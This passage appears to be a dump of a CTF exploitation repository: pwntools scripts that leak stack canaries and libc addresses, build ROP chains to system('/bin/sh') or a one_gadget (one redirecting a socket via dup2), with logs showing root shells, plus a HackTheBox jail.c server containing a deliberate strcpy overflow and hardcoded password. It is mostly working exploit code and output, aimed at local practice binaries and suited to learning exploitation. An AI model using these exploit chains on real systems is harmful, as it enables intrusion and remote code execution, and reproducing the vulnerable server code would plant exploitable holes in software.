121 | buf += p32(0x0)
122 | buf += stack_start_address
123 | buf += buffer_length
124 | 
125 | 
126 | print buf
127 | 
128 | 


--------------------------------------------------------------------------------
/binary/linux/x64/defeat_stack_cookies/exploit.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python
  2 | 
  3 | """
  4 | 
  5 | This is a version of the exploit to solve this exercise:
  6 | - https://made0x78.com/bseries-defeat-stack-cookies/ here you will find his explaination and the source code of this challenge.
  7 | 
  8 | Thanks to @made0x78.
  9 | 
 10 | 
 11 | Canary                        : Yes
 12 | NX                            : Yes
 13 | PIE                           : No
 14 | Fortify                       : No
 15 | RelRO                         : Partial
 16 | 
 17 | 0000000000400730 <recv@plt>:
 18 | 0000000000400740 <write@plt>:
 19 | 0000000000400750 <strlen@plt>:
 20 | 0000000000400760 <__stack_chk_fail@plt>:
 21 | 0000000000400770 <htons@plt>:
 22 | 0000000000400780 <send@plt>:
 23 | 0000000000400790 <close@plt>:
 24 | 00000000004007a0 <listen@plt>:
 25 | 00000000004007b0 <bind@plt>:
 26 | 00000000004007c0 <perror@plt>:
 27 | 00000000004007d0 <bzero@plt>:
 28 | 00000000004007e0 <accept@plt>:
 29 | 00000000004007f0 <exit@plt>:
 30 | 0000000000400800 <fork@plt>:
 31 | 0000000000400810 <socket@plt>:
 32 | 
 33 | 
 34 | ROPgadget --binary cookies  | grep 'pop rdi ; ret'
 35 |     0x0000000000400b83 : pop rdi ; ret
 36 | ROPgadget --binary cookies | grep 'pop rsi ;'
 37 |     0x0000000000400b81 : pop rsi ; pop r15 ; ret
 38 | 
 39 | 
 40 | one_gadget /lib/x86_64-linux-gnu/libc.so.6
 41 | 0xc84da execve("/bin/sh", r12, r13)
 42 | constraints:
 43 |   [r12] == NULL || r12 == NULL
 44 |   [r13] == NULL || r13 == NULL
 45 | 
 46 | 0xc84dd execve("/bin/sh", r12, rdx)
 47 | constraints:
 48 |   [r12] == NULL || r12 == NULL
 49 |   [rdx] == NULL || rdx == NULL
 50 | 
 51 | 0xc84e0 execve("/bin/sh", rsi, rdx)
 52 | constraints:
 53 |   [rsi] == NULL || rsi == NULL
 54 |   [rdx] == NULL || rdx == NULL
 55 | 
 56 | 0xe664b execve("/bin/sh", rsp+0x60, environ)
 57 | constraints:
 58 |   [rsp+0x60] == NULL
 59 | 
 60 | """
 61 | 
 62 | from pwn import *
 63 | 
 64 | HOST = "127.0.0.1"
 65 | PORT = 1234
 66 | 
 67 | def function_leak(host, port, junk, canary, rdi, rsi, got, plt):
 68 | 	io = remote(host, port)
 69 | 	io.clean()
 70 | 	payload = junk + canary + ("B" * 8) + rdi + p64(0x4) + rsi + got + ("A" * 8) + plt
 71 | 	io.sendline(payload)
 72 | 	io.recvuntil(junk)
 73 | 	write = io.recv(8)
 74 | 	io.close()
 75 | 	return write
 76 | 
 77 | def canary_leak(host, port, junk):
 78 | 	io = remote(host, port)
 79 | 	io.clean()
 80 | 	io.sendline(junk)
 81 | 	io.recvuntil(junk)
 82 | 	canary = io.recv(8)
 83 | 	canary = u64(canary) - 0xa
 84 | 	io.recv()
 85 | 	io.close()
 86 | 	return p64(canary)
 87 | 
 88 | pop_rdi = p64(0x400b83)
 89 | pop_rsi_r15 = p64(0x400b81)
 90 | write_got = p64(0x601020)
 91 | write_plt = p64(0x400740)
 92 | 
 93 | 
 94 | junk = "A" * 1032
 95 | 
 96 | # First stage: canary leakage
 97 | 
 98 | canary = canary_leak(HOST, PORT, junk)
 99 | log.success("canary: {}".format(hex(u64(canary))))
100 | 
101 | # Second stage: write@got leakage
102 | 
103 | write_leaked = function_leak(HOST, PORT, junk, canary, pop_rdi, pop_rsi_r15, write_got, write_plt)
104 | log.success("write address {}".format(hex(u64(write_leaked))))
105 | 
106 | # Getting the libc_base_address
107 | 
108 | write_libc = 0xeb8f0
109 | libc_base_address = u64(write_leaked) - write_libc
110 | log.success("libc base address: {}".format(hex(libc_base_address)))
111 | 
112 | 
113 | # Third stage: popping shell...
114 | 
115 | dup2 = p64(libc_base_address + 0xec020)
116 | one_gadget = p64(libc_base_address + 0xe664b)
117 | 
118 | log.success("dup2 address: {}".format(hex(u64(dup2))))
119 | log.success("onegadget address: {}".format(hex(u64(one_gadget))))
120 | 
121 | payload = junk
122 | payload += canary
123 | payload += "B" * 8
124 | payload += pop_rdi
125 | payload += p64(0x4) # fd = 4 -> socket
126 | payload += (pop_rsi_r15)
127 | payload += p64(0x0)
128 | payload += "A" * 8
129 | payload += dup2
130 | payload += pop_rdi
131 | payload += p64(0x4)
132 | payload += pop_rsi_r15
133 | payload += p64(0x1)
134 | payload += "A" * 8
135 | payload += dup2
136 | payload += one_gadget # execve("/bin/sh") if [rsp+0x60] == NULL
137 | payload += "\x00" * 120 #trigger one_gadget constraint
138 | 
139 | 
140 | io = remote(HOST, PORT)
141 | io.clean()
142 | io.sendline(payload)
143 | io.clean()
144 | io.interactive()
145 | 
146 | """
147 | 
148 | root@kali:~/Scrivania/binaries/cookies# ./exploit.py 
149 | [+] Opening connection to 127.0.0.1 on port 1234: Done
150 | [*] Closed connection to 127.0.0.1 port 1234
151 | [+] canary: 0xf9441add86d90c00
152 | [+] Opening connection to 127.0.0.1 on port 1234: Done
153 | [*] Closed connection to 127.0.0.1 port 1234
154 | [+] write address 0x7fa82b4d98f0
155 | [+] libc base address: 0x7fa82b3ee000
156 | [+] dup2 address: 0x7fa82b4da020
157 | [+] onegadget address: 0x7fa82b4d464b
158 | [+] Opening connection to 127.0.0.1 on port 1234: Done
159 | [*] Switching to interactive mode
160 | $ whoami
161 | root
162 | 
163 | """


--------------------------------------------------------------------------------
/binary/linux/x64/canary/exploit.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python
  2 | 
  3 | """
  4 | file ./vuln
  5 |   ./vuln: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=19913e1bed4d738d5ede4a3389cd51cd9b0b5553, for GNU/Linux 3.2.0, not stripped
  6 | 
  7 | Canary                        : Yes
  8 | NX                            : Yes
  9 | PIE                           : No
 10 | Fortify                       : No
 11 | RelRO                         : No
 12 | 
 13 | b *0x000000000040121e
 14 | 
 15 | Non-debugging symbols:
 16 | 	0x0000000000401000  _init
 17 | 	0x0000000000401030  puts@plt
 18 | 	0x0000000000401040  __stack_chk_fail@plt
 19 | 	0x0000000000401050  setbuf@plt
 20 | 	0x0000000000401060  printf@plt
 21 | 	0x0000000000401070  read@plt
 22 | 	0x0000000000401080  _start
 23 | 	0x00000000004010b0  _dl_relocate_static_pie
 24 | 	0x00000000004010c0  deregister_tm_clones
 25 | 	0x00000000004010f0  register_tm_clones
 26 | 	0x0000000000401130  __do_global_dtors_aux
 27 | 	0x0000000000401160  frame_dummy
 28 | 	0x0000000000401162  begin
 29 | 	0x00000000004011cc  FaiCose
 30 | 	0x0000000000401234  main
 31 | 	0x0000000000401290  __libc_csu_init
 32 | 	0x00000000004012f0  __libc_csu_fini
 33 | 	0x00000000004012f4  _fini
 34 | 
 35 | ldd vuln
 36 | 	linux-vdso.so.1 (0x00007ffd03b5f000)
 37 | 	libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f68e4f80000)
 38 | 	/lib64/ld-linux-x86-64.so.2 (0x00007f68e5161000)
 39 | 
 40 | objdump -M intel -d vuln|  grep puts
 41 |   0000000000401030 <puts@plt>:
 42 |     401030:	ff 25 72 23 00 00    	jmp    QWORD PTR [rip+0x2372]        # 4033a8 <puts@GLIBC_2.2.5>
 43 |     40125c:	e8 cf fd ff ff       	call   401030 <puts@plt>
 44 | ROPgadget --binary vuln | grep 'pop rdi ; ret'
 45 | 	0x00000000004012eb : pop rdi ; ret
 46 | 
 47 | readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep puts
 48 |    194: 0000000000074040   429 FUNC    GLOBAL DEFAULT   14 _IO_puts@@GLIBC_2.2.5
 49 |    426: 0000000000074040   429 FUNC    WEAK   DEFAULT   14 puts@@GLIBC_2.2.5
 50 |    501: 00000000000fee10  1241 FUNC    GLOBAL DEFAULT   14 putspent@@GLIBC_2.2.5
 51 |    685: 0000000000100910   697 FUNC    GLOBAL DEFAULT   14 putsgent@@GLIBC_2.10
 52 |   1154: 0000000000072af0   338 FUNC    WEAK   DEFAULT   14 fputs@@GLIBC_2.2.5
 53 |   1698: 0000000000072af0   338 FUNC    GLOBAL DEFAULT   14 _IO_fputs@@GLIBC_2.2.5
 54 |   2336: 000000000007cd00   151 FUNC    WEAK   DEFAULT   14 fputs_unlocked@@GLIBC_2.2.5
 55 | 
 56 | strings -a -t x /lib/x86_64-linux-gnu/libc.so.6 | grep /bin/sh
 57 |  183cee /bin/sh
 58 | 
 59 | readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep system
 60 |    235: 0000000000129b50    99 FUNC    GLOBAL DEFAULT   14 svcerr_systemerr@@GLIBC_2.2.5
 61 |    613: 0000000000046ff0    45 FUNC    GLOBAL DEFAULT   14 __libc_system@@GLIBC_PRIVATE
 62 |   1421: 0000000000046ff0    45 FUNC    WEAK   DEFAULT   14 system@@GLIBC_2.2.5
 63 | 
 64 | 
 65 | """
 66 | 
 67 | from pwn import *
 68 | 
 69 | 
 70 | 
 71 | def leak_cookie(p, junk):
 72 | 	p.recv()
 73 | 	p.sendline(junk)
 74 | 	p.recvuntil(junk)
 75 | 	leaked_cookie = u64(p.recv(8))
 76 | 	cookie = leaked_cookie - 0x0a
 77 | 	log.success("cookie: {}".format(hex(cookie)))
 78 | 	cookie = p64(cookie)
 79 | 	return cookie
 80 | 
 81 | main = p64(0x401234)
 82 | puts_plt = p64(0x401030)
 83 | puts_got = p64(0x4033a8)
 84 | rdi_gadget = p64(0x4012eb) # pop rdi ; ret
 85 | libc_puts = 0x74040
 86 | 
 87 | system_libc = 0x46ff0
 88 | shell_str_libc = 0x183cee # /bin/sh
 89 | 
 90 | junk = "A" * 104
 91 | 
 92 | p = process("./vuln")
 93 | 
 94 | # first stage: cookie leakage
 95 | cookie = leak_cookie(p, junk)
 96 | 
 97 | p.recv()
 98 | 
 99 | # second stage: puts@got leakage
100 | payload = junk + cookie + p64(0x42424242424242) + rdi_gadget + puts_got + puts_plt + main
101 | 
102 | p.sendline(payload)
103 | p.recvuntil(junk)
104 | leaked_puts = u64(p.recvline().strip().ljust(8, b"\x00"))
105 | libc_base_address = leaked_puts - libc_puts
106 | shell = p64(libc_base_address + shell_str_libc)
107 | system = p64(libc_base_address + system_libc)
108 | 
109 | 
110 | log.success("puts@GLIBC_2 leaked: {}".format(hex(leaked_puts)))
111 | log.success("libc_base_address: {}".format(hex(libc_base_address)))
112 | log.success("system(): {}".format(hex(u64(system))))
113 | log.success("shell string: {}".format(hex(u64(shell))))
114 | 
115 | # third stage: getting shell
116 | 
117 | payload = junk + cookie + p64(0x42424242424242) + rdi_gadget + shell + system
118 | p.sendline(junk)
119 | p.recvuntil(junk)
120 | p.clean()
121 | p.sendline(payload)
122 | p.clean()
123 | p.interactive()
124 | 
125 | """
126 | [+] Starting local process './vuln': pid 14476
127 | [+] cookie: 0x80f6c915f596500
128 | [+] puts@GLIBC_2 leaked: 0x7ff7181c5040
129 | [+] libc_base_address: 0x7ff718151000
130 | [+] system(): 0x7ff718197ff0
131 | [+] shell string: 0x7ff7182d4cee
132 | [*] Switching to interactive mode
133 | $ whoami
134 | root
135 | $
136 | """
137 | 
138 | 


--------------------------------------------------------------------------------
/binary/linux/x64/bitterman/exploit.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python
  2 | 
  3 | 
  4 | from pwn import *
  5 | 
  6 | """
  7 | > What's your name? 
  8 | stunn4
  9 | Hi, stunn4
 10 | 
 11 | > Please input the length of your message: 
 12 | 1024
 13 | > Please enter your text: 
 14 | ABCD
 15 | > Thanks!
 16 | 
 17 | To pwn this binary I used a memory leakage technique that allowed me to leak the address of puts to calculate offset
 18 | and then I executed system to open a shell.
 19 | 
 20 | gdb-peda$ checksec
 21 | 	CANARY    : disabled
 22 | 	FORTIFY   : disabled
 23 | 	NX        : ENABLED
 24 | 	PIE       : disabled
 25 | 	RELRO     : disabled
 26 | 
 27 | gdb-peda$ info functions
 28 | 	All defined functions:
 29 | 
 30 | 	File main.c:
 31 | 	13:	int main(int, char **);
 32 | 	6:	int read_nbytes(char *, size_t);
 33 | 
 34 | 	Non-debugging symbols:
 35 | 	0x00000000004004f0  _init
 36 | 	0x0000000000400520  puts@plt
 37 | 	0x0000000000400530  printf@plt
 38 | 	0x0000000000400540  read@plt
 39 | 	0x0000000000400550  __libc_start_main@plt
 40 | 	0x0000000000400560  __gmon_start__@plt
 41 | 	0x0000000000400570  fflush@plt
 42 | 	0x0000000000400580  __isoc99_scanf@plt
 43 | 	0x0000000000400590  _start
 44 | 	0x00000000004005c0  deregister_tm_clones
 45 | 	0x0000000000400600  register_tm_clones
 46 | 	0x0000000000400640  __do_global_dtors_aux
 47 | 	0x0000000000400660  frame_dummy
 48 | 	0x00000000004007f0  __libc_csu_init
 49 | 	0x0000000000400860  __libc_csu_fini
 50 | 	0x0000000000400864  _fini
 51 | 
 52 | First stage:
 53 |     We have to leak a got entry address by calling puts@plt.
 54 |     I chose to print to terminal puts@got.
 55 | What we need?
 56 |     1. a pop rdi gadget since we are calling function using a x64 linux system
 57 |     2. the puts@got address
 58 |     3. the puts@plt address
 59 |     4. the main address to avoid program crashing
 60 | 
 61 | 1. ROPgadget --binary bitterman | grep 'pop rdi ; ret'
 62 |     0x0000000000400853 : pop rdi ; ret
 63 | 
 64 | 2. objdump -j .plt -d bitterman | grep puts
 65 |     0000000000400520 <puts@plt>:
 66 | 	400520:	ff 25 2a 07 20 00    	jmpq   *0x20072a(%rip)        # 600c50 <puts@GLIBC_2.2.5>
 67 | 
 68 | 3. you can see above I used gdb -> info functions to read symbols
 69 | 
 70 | 4. I saw the main address when I executed the program through gdb
 71 | 
 72 | So we are ready to execute our first stage and leak the puts address to calculate offset.
 73 | 	To do this last step we need the address of puts into libc:
 74 | 	readelf -s libc.so.6 | grep puts
 75 | 	   194: 0000000000074040   429 FUNC    GLOBAL DEFAULT   14 _IO_puts@@GLIBC_2.2.5
 76 | 	   426: 0000000000074040   429 FUNC    WEAK   DEFAULT   14 puts@@GLIBC_2.2.5 # This!!
 77 | 	   501: 00000000000fefe0  1241 FUNC    GLOBAL DEFAULT   14 putspent@@GLIBC_2.2.5
 78 | 	   685: 0000000000100ae0   697 FUNC    GLOBAL DEFAULT   14 putsgent@@GLIBC_2.10
 79 | 	  1154: 0000000000072af0   338 FUNC    WEAK   DEFAULT   14 fputs@@GLIBC_2.2.5
 80 | 	  1698: 0000000000072af0   338 FUNC    GLOBAL DEFAULT   14 _IO_fputs@@GLIBC_2.2.5
 81 | 	  2336: 000000000007cd00   151 FUNC    WEAK   DEFAULT   14 fputs_unlocked@@GLIBC_2.2.5
 82 | 	then:
 83 | 	  offset = (leaked_puts - libc_puts)
 84 | 
 85 | So we can use this offset to exploit functions from libc by adding this offset to the functions address into libc.
 86 | 
 87 | 1. shell address
 88 | strings -a -t x libc.so.6 | grep /bin/sh
 89 |     183cee /bin/sh
 90 | 2. system address
 91 | readelf -s libc.so.6 | grep system
 92 |     235: 0000000000129d20    99 FUNC    GLOBAL DEFAULT   14 svcerr_systemerr@@GLIBC_2.2.5
 93 |     613: 0000000000046ff0    45 FUNC    GLOBAL DEFAULT   14 __libc_system@@GLIBC_PRIVATE
 94 |     1421: 0000000000046ff0    45 FUNC    WEAK   DEFAULT   14 system@@GLIBC_2.2.5
 95 | 
 96 | ./exploit.py 
 97 | 	[+] Starting local process './bitterman': pid 11075
 98 | 	[+] leaked puts: 0x7fba59314040
 99 | 	[*] Switching to interactive mode
100 | 
101 | 	$ whoami
102 | 	root
103 | 	$
104 | 
105 | """
106 | 
107 | PROGRAM_NAME = "./bitterman"
108 | 
109 | #p = gdb.debug(PROGRAM_NAME, "b main")
110 | p = process(PROGRAM_NAME)
111 | 
112 | 
113 | 
114 | 
115 | 
116 | rdi_gadget = p64(0x400853) # pop rdi ; ret
117 | puts_got = p64(0x600c50)
118 | puts_plt = p64(0x400520)
119 | main = p64(0x4006ec)
120 | 
121 | 
122 | junk = "A" * 152
123 | 
124 | 
125 | buf = ""
126 | buf += junk
127 | buf += rdi_gadget
128 | buf += puts_got
129 | buf += puts_plt
130 | buf += main
131 | 
132 | 
133 | p.sendlineafter("name?", "stunn4")
134 | p.recvline()
135 | p.sendlineafter("message:", "1024")
136 | p.recvline()
137 | p.sendlineafter("text:", buf)
138 | p.recvline()
139 | p.recvuntil("Thanks!")
140 | 
141 | libc_puts = 0x74040
142 | leaked_puts = p.recv()
143 | leaked_puts = u64(leaked_puts[:8].strip().ljust(8, "\x00"))
144 | offset = (leaked_puts - libc_puts)
145 | 
146 | log.success("leaked puts: " + hex(leaked_puts))
147 | 
148 | bin_sh = p64(0x183cee + offset)
149 | libc_system = p64(0x46ff0 + offset)
150 | 
151 | buf = ""
152 | buf += junk
153 | buf += rdi_gadget
154 | buf += bin_sh
155 | buf += libc_system
156 | 
157 | 
158 | p.sendline("stunn4")
159 | p.recvline()
160 | p.sendlineafter("message:", "1024")
161 | p.recvline()
162 | p.sendlineafter('text:', buf)
163 | p.recvline()
164 | p.recvuntil("Thanks!")
165 | 
166 | 
167 | 
168 | p.interactive()


--------------------------------------------------------------------------------
/binary/linux/x64/simplerop/exploit.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python
  2 | 
  3 | """
  4 | 
  5 | To pwn this exercise we need to write an exploit that leaks some information to get addresses of useful
  6 | functions like system.
  7 | 
  8 | In a first istance we see checksec:
  9 |     CANARY    : disabled
 10 |     FORTIFY   : disabled
 11 |     NX        : ENABLED
 12 |     PIE       : disabled
 13 |     RELRO     : Partial
 14 | and we understand that there is ASLR and we can't execute stuff from the stack.
 15 | 
 16 | Then we can check the plt functions available and we see them as follow:
 17 | 
 18 |     0x0000000000401000  _init
 19 | 	0x0000000000401030  puts@plt
 20 | 	0x0000000000401040  gets@plt
 21 | 	0x0000000000401050  _start
 22 | 	0x0000000000401080  _dl_relocate_static_pie
 23 | 	0x0000000000401090  deregister_tm_clones
 24 | 	0x00000000004010c0  register_tm_clones
 25 | 	0x0000000000401100  __do_global_dtors_aux
 26 | 	0x0000000000401130  frame_dummy
 27 | 	0x0000000000401132  main
 28 | 	0x0000000000401160  __libc_csu_init
 29 | 	0x00000000004011c0  __libc_csu_fini
 30 | 	0x00000000004011c4  _fini
 31 | 
 32 | There is puts@plt function that maybe we could exploit to get our libc offset.
 33 | 
 34 | Let's check the junk size through pattern_* and we see that 40 bytes are enough to overwrite
 35 | the RIP address.
 36 | 
 37 | So we are in a first stage and we need three addresses to exploit in order to leak the address we
 38 | choose:
 39 | 	1. a 'pop rdi ; ret' gadget since we are into a x64 linux environment and we need to send a parameter to puts@plt
 40 | 	2. the puts@GLIBC address (this is our parameter)
 41 | 	3. puts@plt (the function we want to call)
 42 | 	4. main function address: this is important because we will not terminate the program execution to avoid ASLR actions.
 43 | 
 44 | 
 45 | 1. POP RDI ; RET
 46 | # ROPgadget --binary vuln | grep 'pop rdi ; ret' 
 47 | 	0x00000000004011bb : pop rdi ; ret
 48 | 
 49 | 2. puts@GLIBC
 50 | # objdump -j .plt -d vuln | grep puts
 51 | 	0000000000401030 <puts@plt>:
 52 | 	401030:	ff 25 e2 2f 00 00    	jmpq   *0x2fe2(%rip)        # 404018 <puts@GLIBC_2.2.5>
 53 | 
 54 | 
 55 | 3. puts@plt: I used to read symbols from gdb through 'info functions' as you can see above.
 56 |     0x0000000000401030  puts@plt
 57 | 
 58 | 
 59 | 4. same as 3
 60 | 	0x0000000000401132  main
 61 | 
 62 | 
 63 | 
 64 | This is enough to solve our first stage, we will see the puts address leaked and main() called again.
 65 | 
 66 | We can unpack our information leaked to read that and we need unpacking in order to use this address to calculate
 67 | at runtime the addresses we need to call system@@GLIBC.
 68 | First of all we need to do a subtraction to get our offset that we will use to calculate the other addresses we need:
 69 | 	offset = leaked_puts - libc_puts
 70 | where I found libc_puts through readelf:
 71 | # readelf -s libc.so.6 | grep puts
 72 |     194: 0000000000074040   429 FUNC    GLOBAL DEFAULT   14 _IO_puts@@GLIBC_2.2.5
 73 |     426: 0000000000074040   429 FUNC    WEAK   DEFAULT   14 puts@@GLIBC_2.2.5 # THIS ONE!
 74 |     501: 00000000000fefe0  1241 FUNC    GLOBAL DEFAULT   14 putspent@@GLIBC_2.2.5
 75 |     685: 0000000000100ae0   697 FUNC    GLOBAL DEFAULT   14 putsgent@@GLIBC_2.10
 76 |     1154: 0000000000072af0   338 FUNC    WEAK   DEFAULT   14 fputs@@GLIBC_2.2.5
 77 |     1698: 0000000000072af0   338 FUNC    GLOBAL DEFAULT   14 _IO_fputs@@GLIBC_2.2.5
 78 |     2336: 000000000007cd00   151 FUNC    WEAK   DEFAULT   14 fputs_unlocked@@GLIBC_2.2.5
 79 | 
 80 | Now we can calculate our system and /bin/sh addresses as follow:
 81 | # readelf -s libc.so.6 | grep system
 82 |     235: 0000000000129d20    99 FUNC    GLOBAL DEFAULT   14 svcerr_systemerr@@GLIBC_2.2.5
 83 |     613: 0000000000046ff0    45 FUNC    GLOBAL DEFAULT   14 __libc_system@@GLIBC_PRIVATE
 84 |     1421: 0000000000046ff0    45 FUNC    WEAK   DEFAULT   14 system@@GLIBC_2.2.5 # THIS ONE!
 85 | 
 86 | libc_system = p64(0x46ff0 + offset)
 87 | 
 88 | # strings -a -t x libc.so.6  | grep /bin/sh
 89 |     183cee /bin/sh
 90 | 
 91 | bin_sh_string = p64(0x183cee + offset)
 92 | 
 93 | 
 94 | # ./exploit.py
 95 | 
 96 | 	[+] Starting local process './vuln': pid 5898
 97 | 	[+] puts@got leaked: 0x7fb4b97eb040
 98 | 	[+] system() :0x7fb4b97bdff0
 99 | 	[+] /bin/sh : 0x7fb4b98facee
100 | 	[*] Switching to interactive mode
101 | 
102 | 
103 | 	$ id
104 | 	uid=0(root) gid=0(root) gruppi=0(root)
105 | 
106 | 
107 | resource: https://tasteofsecurity.com/security/ret2libc-unknown-libc/
108 | 
109 | """
110 | 
111 | 
112 | from pwn import *
113 | 
114 | p = process("./vuln")
115 | 
116 | junk = "A" * 40
117 | 
118 | 
119 | rdi_gadget = p64(0x4011bb) # pop rdi ; ret
120 | puts_got = p64(0x404018) # puts@GLIBC_2.2.5
121 | puts_plt = p64(0x401030) 
122 | main = p64(0x401132) 
123 | 
124 | buf = ""
125 | buf += junk
126 | buf += rdi_gadget
127 | buf += puts_got
128 | buf += puts_plt
129 | buf += main
130 | 
131 | p.sendlineafter("ROP.", buf)
132 | 
133 | p.recvline()
134 | p.recvline()
135 | 
136 | libc_puts = 0x74040
137 | leaked_puts = u64(p.recvline().strip().ljust(8, "\x00"))
138 | offset = leaked_puts - libc_puts
139 | 
140 | bin_sh_string = p64(0x183cee + offset)
141 | libc_system = p64(0x46ff0 + offset)
142 | 
143 | log.success("puts@got leaked: " + hex(leaked_puts))
144 | log.success("system() :" + hex(u64(libc_system)))
145 | log.success("/bin/sh : " + hex(u64(bin_sh_string)))
146 | 
147 | 
148 | buf = junk
149 | buf += rdi_gadget
150 | buf += bin_sh_string
151 | buf += libc_system
152 | 
153 | 
154 | p.sendlineafter("ROP.", buf)
155 | 
156 | 
157 | p.interactive()
158 | 
159 | 
160 | 
161 | 
162 | 


--------------------------------------------------------------------------------
/binary/linux/x86/jail/jail.c:
--------------------------------------------------------------------------------
  1 | 
  2 | // this source is from Jail box at hackthebox.eu (retired box!).
  3 | 
  4 | #include <stdio.h>
  5 | #include <stdlib.h>
  6 | #include <netdb.h>
  7 | #include <netinet/in.h>
  8 | #include <string.h>
  9 | #include <unistd.h>
 10 | #include <time.h>
 11 | 
 12 | int debugmode;
 13 | int handle(int sock);
 14 | int auth(char *username, char *password);
 15 | 
 16 | int auth(char *username, char *password) {
 17 |     char userpass[16];
 18 |     char *response;
 19 |     if (debugmode == 1) {
 20 |         printf("Debug: userpass buffer @ %p\n", userpass);
 21 |         fflush(stdout);
 22 |     }
 23 |     if (strcmp(username, "admin") != 0) return 0;
 24 |     strcpy(userpass, password);
 25 |     if (strcmp(userpass, "1974jailbreak!") == 0) {
 26 |         return 1;
 27 |     } else {
 28 |         printf("Incorrect username and/or password.\n");
 29 |         return 0;
 30 |     }
 31 |     return 0;
 32 | }
 33 | 
 34 | int handle(int sock) {
 35 |     int n;
 36 |     int gotuser = 0;
 37 |     int gotpass = 0;
 38 |     char buffer[1024];
 39 |     char strchr[2] = "\n\x00";
 40 |     char *token;
 41 |     char username[256];
 42 |     char password[256];
 43 |     debugmode = 0;
 44 |     memset(buffer, 0, 256);
 45 |     dup2(sock, STDOUT_FILENO);
 46 |     dup2(sock, STDERR_FILENO);
 47 |     printf("OK Ready. Send USER command.\n");
 48 |     fflush(stdout);
 49 |     while(1) {
 50 |         n = read(sock, buffer, 1024);
 51 |         if (n < 0) {
 52 |             perror("ERROR reading from socket");
 53 |             return 0;
 54 |         }
 55 |         token = strtok(buffer, strchr);
 56 |         while (token != NULL) {
 57 |             if (gotuser == 1 && gotpass == 1) {
 58 |                 break;
 59 |             }
 60 |             if (strncmp(token, "USER ", 5) == 0) {
 61 |                 strncpy(username, token+5, sizeof(username));
 62 |                 gotuser=1;
 63 |                 if (gotpass == 0) {
 64 |                     printf("OK Send PASS command.\n");
 65 |                     fflush(stdout);
 66 |                 }
 67 |             } else if (strncmp(token, "PASS ", 5) == 0) {
 68 |                 strncpy(password, token+5, sizeof(password));
 69 |                 gotpass=1;
 70 |                 if (gotuser == 0) {
 71 |                     printf("OK Send USER command.\n");
 72 |                     fflush(stdout);
 73 |                 }
 74 |             } else if (strncmp(token, "DEBUG", 5) == 0) {
 75 |                 if (debugmode == 0) {
 76 |                     debugmode = 1;
 77 |                     printf("OK DEBUG mode on.\n");
 78 |                     fflush(stdout);
 79 |                 } else if (debugmode == 1) {
 80 |                     debugmode = 0;
 81 |                     printf("OK DEBUG mode off.\n");
 82 |                     fflush(stdout);
 83 |                 }
 84 |             }
 85 |             token = strtok(NULL, strchr);
 86 |         }
 87 |         if (gotuser == 1 && gotpass == 1) {
 88 |             break;
 89 |         }
 90 |     }
 91 |     if (auth(username, password)) {
 92 |         printf("OK Authentication success. Send command.\n");
 93 |         fflush(stdout);
 94 |         n = read(sock, buffer, 1024);
 95 |         if (n < 0) {
 96 |             perror("Socket read error");
 97 |             return 0;
 98 |         }
 99 |         if (strncmp(buffer, "OPEN", 4) == 0) {
100 |             printf("OK Jail doors opened.");
101 |             fflush(stdout);
102 |         } else if (strncmp(buffer, "CLOSE", 5) == 0) {
103 |             printf("OK Jail doors closed.");
104 |             fflush(stdout);
105 |         } else {
106 |             printf("ERR Invalid command.\n");
107 |             fflush(stdout);
108 |             return 1;
109 |         }
110 |     } else {
111 |         printf("ERR Authentication failed.\n");
112 |         fflush(stdout);
113 |         return 0;
114 |     }
115 |     return 0;
116 | }
117 | 
118 | int main(int argc, char *argv[]) {
119 |     int sockfd;
120 |     int newsockfd;
121 |     int port;
122 |     int clientlen;
123 |     char buffer[256];
124 |     struct sockaddr_in server_addr;
125 |     struct sockaddr_in client_addr;
126 |     int n;
127 |     int pid;
128 |     int sockyes;
129 |     sockyes = 1;
130 |     sockfd = socket(AF_INET, SOCK_STREAM, 0);
131 |     if (sockfd < 0) {
132 |         perror("Socket error");
133 |         exit(1);
134 |     }
135 |     if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &sockyes, sizeof(int)) == -1) {
136 |         perror("Setsockopt error");
137 |         exit(1);
138 |     }
139 |     memset((char*)&server_addr, 0, sizeof(server_addr));
140 |     port = 7411;
141 |     server_addr.sin_family = AF_INET;
142 |     server_addr.sin_addr.s_addr = INADDR_ANY;
143 |     server_addr.sin_port = htons(port);
144 |     if (bind(sockfd, (struct sockaddr*)&server_addr, sizeof(server_addr)) < 0) {
145 |         perror("Bind error");
146 |         exit(1);
147 |     }
148 |     listen(sockfd, 200);
149 |     clientlen = sizeof(client_addr);
150 |     while (1) {
151 |         newsockfd = accept(sockfd, (struct sockaddr*)&client_addr, &clientlen);
152 |         if (newsockfd < 0) {
153 |             perror("Accept error");
154 |             exit(1);
155 |         }
156 |         pid = fork();
157 |         if (pid < 0) {
158 |             perror("Fork error");
159 |             exit(1);
160 |         }
161 |         if (pid == 0) {
162 |             close(sockfd);
163 |             exit(handle(newsockfd));
164 |         } else {
165 |             close(newsockfd);
166 |         }
167 |     }
168 | }
169 | 
170 | 


--------------------------------------------------------------------------------
/binary/linux/x64/garbage/exploit.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python3
  2 | 
  3 | """
  4 | 
  5 | Canary                        : No
  6 | NX                            : Yes
  7 | PIE                           : No
  8 | Fortify                       : No
  9 | RelRO                         : Partial
 10 | 
 11 | 
 12 | gef➤  info functions
 13 | All defined functions:
 14 | 
 15 | Non-debugging symbols:
 16 | 0x0000000000401000  _init
 17 | 0x0000000000401030  putchar@plt
 18 | 0x0000000000401040  strcpy@plt
 19 | 0x0000000000401050  puts@plt
 20 | 0x0000000000401060  fclose@plt
 21 | 0x0000000000401070  getpwuid@plt
 22 | 0x0000000000401080  getuid@plt
 23 | 0x0000000000401090  printf@plt
 24 | 0x00000000004010a0  rewind@plt
 25 | 0x00000000004010b0  fgetc@plt
 26 | 0x00000000004010c0  read@plt
 27 | 0x00000000004010d0  fgets@plt
 28 | 0x00000000004010e0  strcmp@plt
 29 | 0x00000000004010f0  getchar@plt
 30 | 0x0000000000401100  gets@plt
 31 | 0x0000000000401110  syslog@plt
